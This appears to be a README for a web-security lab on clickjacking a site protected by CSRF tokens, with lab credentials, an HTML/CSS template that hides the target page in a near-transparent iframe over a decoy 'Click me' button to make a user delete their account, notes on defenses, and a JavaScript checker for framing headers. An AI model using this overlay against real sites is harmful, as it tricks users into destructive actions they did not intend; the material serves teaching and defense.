This repository contains the project files and documentation for analyzing and exploiting basic clickjacking against a site that uses CSRF (Cross-Site Request Forgery) token protection. The project demonstrates how to exploit clickjacking vulnerabilities and explores methods to defend against them.
The task is to craft an HTML exploit that manipulates a user's interaction on a decoy website, tricking them into deleting their account on a vulnerable site. The goal is to bypass CSRF token protection by placing the target page in a transparent iframe so that its button sits over the decoy content. The token does not help here because the click lands on the genuine page, which submits the request with its own valid token.
- Understand clickjacking techniques:
  - Learn how iframe overlays can be maliciously used.
- Analyze CSRF token protection mechanisms:
  - Study vulnerabilities in token-based protections.
- Craft an HTML exploit:
  - Develop an iframe-based attack to bypass user awareness.
- Demonstrate exploit delivery:
  - Test the crafted exploit in a controlled environment to achieve account deletion.
- Use the provided credentials:
  - Username: wiener
  - Password: Peter
- Access the "Delete account" section of the target website.
- Use the following HTML template to craft the exploit:

```html
<style>
    iframe {
        position: relative;
        width: 1000px;
        height: 700px;
        opacity: 0.000001;
        z-index: 2;
    }
    div {
        position: absolute;
        top: 515px;
        left: 60px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="YOUR-LAB-ID"></iframe>
```

- Understanding iframe manipulation for clickjacking attacks.
- The role of CSRF tokens in securing user actions.
- Practical application of HTML and CSS in crafting exploits.
- Defense Mechanisms:
  - Use of X-Frame-Options headers to prevent embedding in iframes.
  - Implementing Content Security Policies (CSP) to restrict iframe behavior.
  - Robust validation of CSRF tokens to enhance security.
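
To check the header-based defenses listed above, the following sketch (an added example, not part of the original lab material) evaluates a response's headers and reports whether a given origin could still frame the page. The function names and the `.example` origins are hypothetical, and the model assumes a single direct embedder and one CSP header.

```javascript
// Added example. Origins and header values are constructed samples.
// Simplifications: one direct embedder, a single CSP header, and
// scheme-qualified host sources (https://host or https://*.host).

function parseFrameAncestors(csp) {
  // Return the frame-ancestors source list, or null if the directive is absent.
  for (const directive of csp.split(';')) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === 'frame-ancestors') return sources;
  }
  return null;
}

function sourceMatches(source, embedder, self) {
  const s = source.toLowerCase();
  if (s === "'self'") return embedder === self;
  if (s === '*') return true;
  if (s.endsWith(':')) return embedder.startsWith(s + '//'); // scheme source
  if (s.includes('://*.')) {
    const [scheme, host] = s.split('://*.');
    const e = new URL(embedder);
    return e.protocol === scheme + ':' && e.hostname.endsWith('.' + host);
  }
  return s === embedder; // 'none' and unknown keywords match nothing
}

// True if `embedder` could load the response in an iframe.
function canBeFramedBy(headers, embedder, self) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  // Only the enforcing header counts; Content-Security-Policy-Report-Only blocks nothing.
  const csp = h['content-security-policy'];
  const ancestors = csp ? parseFrameAncestors(csp) : null;
  if (ancestors !== null) {
    // An enforced frame-ancestors directive makes browsers ignore X-Frame-Options.
    return ancestors.some((src) => sourceMatches(src, embedder, self));
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return embedder === self;
  return true; // absent, obsolete ALLOW-FROM, or unrecognized: no protection
}
```

A result of `true` for any origin other than the site's own means the "Delete account" page can still be overlaid as in the template above.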
This repository is strictly for educational purposes. It is intended to provide insights into web security vulnerabilities and methods to mitigate such risks. Any misuse of the content for unauthorized purposes is strictly prohibited.